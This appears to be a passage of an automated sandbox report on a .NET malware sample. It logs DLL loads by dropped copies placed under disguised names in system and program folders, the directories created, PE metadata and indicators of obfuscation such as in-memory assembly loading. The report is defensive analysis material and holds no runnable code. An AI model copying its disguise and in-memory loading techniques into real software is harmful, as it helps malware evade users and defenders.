            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: mscoree.dll
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: apphelp.dll
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: version.dll
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: uxtheme.dll
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: windows.storage.dll
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: wldp.dll
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: profapi.dll
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: cryptsp.dll
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: rsaenh.dll
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: cryptbase.dll
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: sspicli.dll
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: amsi.dll
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: userenv.dll
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: wbemcomn.dll
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: dnsapi.dll
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: dhcpcsvc.dll
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: winnsi.dll
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: rasapi32.dll
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: rasman.dll
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: rtutils.dll
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: mswsock.dll
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: winhttp.dll
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: rasadhlp.dll
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: fwpuclnt.dll
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: mscoree.dll
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: apphelp.dll
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: version.dll
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: uxtheme.dll
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: windows.storage.dll
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: wldp.dll
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: profapi.dll
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: cryptsp.dll
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: rsaenh.dll
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: cryptbase.dll
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: sspicli.dll
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: mscoree.dll
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: version.dll
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: uxtheme.dll
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: windows.storage.dll
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: wldp.dll
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: profapi.dll
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: cryptsp.dll
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: rsaenh.dll
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: cryptbase.dll
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: sspicli.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: mscoree.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: apphelp.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: version.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: uxtheme.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: windows.storage.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: wldp.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: profapi.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: cryptsp.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: rsaenh.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: cryptbase.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: sspicli.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: mscoree.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: version.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: uxtheme.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: windows.storage.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: wldp.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: profapi.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: cryptsp.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: rsaenh.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: cryptbase.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: sspicli.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: mscoree.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: apphelp.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: version.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: wldp.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: profapi.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: sspicli.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: mscoree.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: version.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: wldp.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: profapi.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: mscoree.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: apphelp.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: mscoree.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: sspicli.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exe Directory created: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exe Directory created: C:\Program Files\Windows Sidebar\Gadgets\26c12092da979c
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exe Directory created: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exe Directory created: C:\Program Files\Mozilla Firefox\fonts\645bc6bab0f65c
            Source: oFAjWuoHBq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: oFAjWuoHBq.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: oFAjWuoHBq.exeStatic file information: File size 2403328 > 1048576
            Source: oFAjWuoHBq.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x247200
            Source: oFAjWuoHBq.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdbU.o. a._CorDllMainmscoree.dll source: oFAjWuoHBq.exe, 00000000.00000002.2053492926.000000001B500000.00000004.08000000.00040000.00000000.sdmp, oFAjWuoHBq.exe, 00000000.00000002.2030805631.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003111000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdb source: oFAjWuoHBq.exe, 00000000.00000002.2053492926.000000001B500000.00000004.08000000.00040000.00000000.sdmp, oFAjWuoHBq.exe, 00000000.00000002.2030805631.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003111000.00000004.00000800.00020000.00000000.sdmp

            Data Obfuscation

            Source: oFAjWuoHBq.exe, sWIJymEd3TnvLXnsdXU.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: oFAjWuoHBq.exe, vcQJskW4wjByrVXDpqp.cs.Net Code: XBaoAwE39x System.AppDomain.Load(byte[])
            Source: oFAjWuoHBq.exe, vcQJskW4wjByrVXDpqp.cs.Net Code: XBaoAwE39x System.Reflection.Assembly.Load(byte[])
            Source: oFAjWuoHBq.exe, vcQJskW4wjByrVXDpqp.cs.Net Code: XBaoAwE39x
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 17_2_00007FF848F400BD pushad ; iretd 17_2_00007FF848F400C1
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeCode function: 18_2_00007FF848F400BD pushad ; iretd 18_2_00007FF848F400C1
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 24_2_00007FF848F400BD pushad ; iretd 24_2_00007FF848F400C1
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 25_2_00007FF848F400BD pushad ; iretd 25_2_00007FF848F400C1
            Source: oFAjWuoHBq.exe, C18IexyuqO3X6bU42Vn.csHigh entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
            Source: oFAjWuoHBq.exe, itivEpyXAAQjEFUSCAp.csHigh entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
            Source: oFAjWuoHBq.exe, LH8aa71HOuQSRug8cwM.csHigh entropy of concatenated method names: 'fJih49MPey', 'UlKhYwXm9S', 'sLohu0YDVb', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'pHnhc78ltP'
            Source: oFAjWuoHBq.exe, O533fko5EpA7Hjr0g5s.csHigh entropy of concatenated method names: 'rO3bwX6bU4', 'IVnbKROUq0', 'I9KbZxDJjU', 'RWIbrG0yCZ', 'VLhb860CJJ', 'WVPZDCbmpt6NGdY5IKw', 'zTcgKTbGXyAIqqADwEl', 'kZanohbRvYajwwg8Tie', 'Dyec4dbhLmIf8BTIet8', 'rnURRNbNASuFv1dMXDR'
            Source: oFAjWuoHBq.exe, XL0iThzPQJTYWWJ3UB.csHigh entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'zsxLGfmpmPsCGCYwHD4', 'gKVOY2mRhwwr81YVSff', 'y4bCOumhVcgmnGQmqWH', 'yodKm6mm6WoE7cjZvfZ', 'KIGL5xmGi9wqAfTYEZp', 'kTTZg5mNqG7ZTQYuk3u'
            Source: oFAjWuoHBq.exe, td4rKTEu7UWFH3n2Zvv.csHigh entropy of concatenated method names: 'L5U3LbeeQWpXV', 'OjhPGE09N0jUrqLvEbd', 'YsXuJZ0dLC059ILc6mG', 'xr8q9g0fffPhBpDlIFf', 'P5wyR10BTsJSbdTYWPm', 'AlF9T202mxHbaErvZJB', 'RKj0CA0tbh6qwqmynyG', 'yR90T70g86aw1ls4RYx', 'c5qw6h0Awycs4Tix21U', 'YTEKvr08saO5pmq70HI'
            Source: oFAjWuoHBq.exe, hZiEsmfZFcSKOlYV9qM.csHigh entropy of concatenated method names: 'FkTRyQE1CT', 'ocwRfu67mF', 'IOrR1eBBGm', 'jebRE4cgko', 'G7oRb0BaEw', 'lOCR4IwsEG', 'FFFRYUSO7u', 'lidRuXJkNH', 'E5qRcN30X5', 'aQdRMo83mD'
            Source: oFAjWuoHBq.exe, hF88NYCTSKrIITHcubX.csHigh entropy of concatenated method names: 'm9pWuMLroG', 'kv4WcZ90Mw', 'PI9BseuogPaAaIxQ0JI', 'b5jjW7usxr8xG3FFNw6', 'tJ5BJBuuh1J8MlH4x6P', 'wiL72XujTImTRGF86RR', 'qOiACautYyn7hOMQALQ', 'hFFLGMugZjoXJIyjbUD', 'ejZOoJu9OWCDb73bVHo', 'YPLtb8udRn1psMvSbPw'
            Source: oFAjWuoHBq.exe, MLqUbOC5FRrvvhuJfxl.csHigh entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'VODxsyNEgxToDq9NJkU', 'WSlPRIND1MexbhQftyf', 'AtnsNmNX4AIr4jCohGk', 'BnqLeeNpm7xJBx9uRvF', 'vJrcmdNR4R8FBFIY3d0', 'd3BwfMNh7REIit8ngJs'
            Source: oFAjWuoHBq.exe, tPdkxhonf1CIRrb8hfC.csHigh entropy of concatenated method names: 'sg9', 'KuhIlnaxSZ', 'zot4Xf5hoG', 'sFeI9VdyN9', 'BWL1wkMQUDKcj8Q0R5V', 'lUDm45MndS9QvrcND9k', 'kn1bfDM1Ld72yESjqQW', 'cI8f6fM0Tpl57PItVTV', 't2fTiAMyZxHB2vskZ3j', 'n2cXcoMWluhpyDKh1kF'
            Source: oFAjWuoHBq.exe, notAaue7ZrBJ8DsXOu.csHigh entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'Dy9vGd5wH', 'Sx2YyQXFleA96yICsUs', 'lT3bhRXYPHnDMweS48h', 'G124afXeqSndDfQNsET', 'IOjUhAXIsys5jgkY9lw', 'DvVBkPXiQa9yUQTPL6Q'
            Source: oFAjWuoHBq.exe, sFL7fe10HOVS6xhRTUD.csHigh entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'XG2hR7aLyO', 'ovIhNtuhVV', 'Cwqhht6ALk', 'IZghsghpB5', 'b26hHPkM6R', 'EA7hU1ZC87', 'swSDCMrevI5WytaYFMG'
            Source: oFAjWuoHBq.exe, BXBkI5y4HWNAxVSphr1.csHigh entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
            Source: oFAjWuoHBq.exe, OwI9UdorJeiK15bvkny.csHigh entropy of concatenated method names: 'QcTpvHkeqjiXlZTBWCl', 'mZSOBLkI2U3JMGHaPIJ', 'Dgud79kFNKNqPjYIIva', 'nqGdoVkYo2fnlPeTB3E', 'IWF', 'j72', 'ooyYgX9uCK', 'n5DY5uDemQ', 'j4z', 'SocYqIH0VQ'
            Source: oFAjWuoHBq.exe, MjVNDyf8m9C5qT2jGJR.csHigh entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'LlhRB575ki', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
            Source: oFAjWuoHBq.exe, Q6LCvdyhHTVvD2Zq8KC.csHigh entropy of concatenated method names: 'JqedefxCWX', 'wBtdpCEIyb', 'BSVd6CSspt', 'sTgd7RM8tQ', 'HhHd24TiJ5', 'fvfU5hlAYq9ThpMZAEK', 'IBF9EDlBpgrZ5V73Esv', 'EppX8Dl28xIpaK4MtIf', 'Jdpb1jl8n7NWOWZjguu', 'MGKbZ8lvsg8kQWWOhxt'
            Source: oFAjWuoHBq.exe, VgZuJICoAnnnggcdWDe.csHigh entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'Q8m4uVma1i8HoUCHsBy', 'gXdW0NmUnmae9u6U0al', 'qyIEswm75o1RpU2aR3L', 'fpF5vYm5lLQshWHn3Ci', 'Mo5ttTmqsY0ExPFRXuS', 'Ly5fYOmF8CvDbrn6Fki'
            Source: oFAjWuoHBq.exe, PRv6YTCfKvBB74DQ91n.csHigh entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'ecBh4Om0Agx86PTfEuZ', 'Sn2EUomy2qM2BKkxvRU', 'xnTMygmQfrJPrkRhJgb', 'Mh1VIpmnappDpjCIvuh', 'JVljolm13W2bhMg99rb', 'dgcYZZmWnpnLPRnTLC5'
            Source: oFAjWuoHBq.exe, UhEagAChdymwejGsiAX.csHigh entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'UA6k2TNLEyIvjyLAII1', 'lc7xhANzNk6Po8nc2r1', 'tMouvZSE3Q3EMXHr8WZ', 'NPvcwZSDrfBwuu8Sdly', 'PxOZuWSXWgOvEqmr6Uo', 'yifNjCSpha2PoVsdMaF'
            Source: oFAjWuoHBq.exe, UDaXAKWWVgTW4lwb7dx.csHigh entropy of concatenated method names: 'tQKW9LZGAR', 'U0CWPeWCLs', 'gdIWSw88JX', 'NMDWO9XdKe', 'vUDWwdOk41', 'fKGWKP7Rsf', 'jybHRSjB3jLbsdFH98f', 'oq53JTj2F6E1OcV0FSo', 'aJwBCajd3QgyTXjtiDY', 'BSnqs8jfkNZSNGEiVGi'
            Source: oFAjWuoHBq.exe, hAIYl7yLKCWNlk7chwE.csHigh entropy of concatenated method names: 'WbPMet4WuH', 'CEBMppw6lJ', 'gRsM6mqX1f', 'MD8M7WgLkI', 'aXTM2tatP5', 'uTTgeAOFtE3MqE4RGo0', 'DskT4MOYSVCwRX1BGu0', 'Gd1cblO5cEIDyL3nZ6i', 'Ej6CQLOqStm5THAyHBW', 'M3rw3rOemxk3sIVEPDw'
            Source: oFAjWuoHBq.exe, EDrgRf1SIQNkPQLfuDP.csHigh entropy of concatenated method names: 'AXXUmyyjPk', '_1kO', '_9v4', '_294', 'kMeUBF9BLq', 'euj', 'wwnUkwWSoB', 'dRYURG5g4R', 'o87', 'd41UNWTpxx'
            Source: oFAjWuoHBq.exe, CFBsI01WJbRR9QM9EJO.csHigh entropy of concatenated method names: 'cG3NbosIte', 'sVAN45w6c1', '_8r1', 'SwvNYd9owp', 'oRsNufqdoq', 'q3LNc3FjFl', 'sO0NMRxKxV', 'jdj7D03dtdULnfgkZsc', 'EuT8wL3fqIvNGLwHGgy', 'Pg2RVc3BqMjwma8S5XL'
            Source: oFAjWuoHBq.exe, nGTb8eCAkDE2Ou3IqwW.csHigh entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'kEMcNEGi2hoahmc2Svv', 'BVe84aG3pJ0MAaNIX2Z', 'WZbwliGwoXyldd59mFj', 'XQky6eGr1Rb5ZYeLdGp', 'hV9p2GGCW8USe2n7QWR', 'osfLxAGZXfu2NCsaxpV'
            Source: oFAjWuoHBq.exe, cs1uPX1FlBpBw3FANe7.csHigh entropy of concatenated method names: 'PdPRDr0drG', 'UxjRTWaPOJ', 'EGHR9a7iTD', 'NVRRPdLYXf', 'p2GRStLAuJ', 'ohTRO7HiXB', '_838', 'vVb', 'g24', '_9oL'
            Source: oFAjWuoHBq.exe, seZMJm2gMaojmHuI3e.csHigh entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'GhaQrMpYMYQ8hOE1w3j', 'Y3Eu9ppe5HrITcP3I0T', 'HdexwbpI1W9k0w23ibB', 'bBv4xPpiSesKiUXq5i9', 'os5Pwnp3t3KIHiw0Ztc', 'juw7Vbpw5F12o9CgSao'
            Source: oFAjWuoHBq.exe, PZv7ZiERParVd0OGhgI.csHigh entropy of concatenated method names: 'AVV0kBJcY1', 'zqy0RWQ7x4', 'LBp0NrEkro', 'JHn0hGYj1m', 'PIV0sXrWur', 'O170HKUOJ3', 'Wtj0U8ykqi', 'nMG0xmsrub', 'Uwr00tBduX', 'Uev0ieFydw'
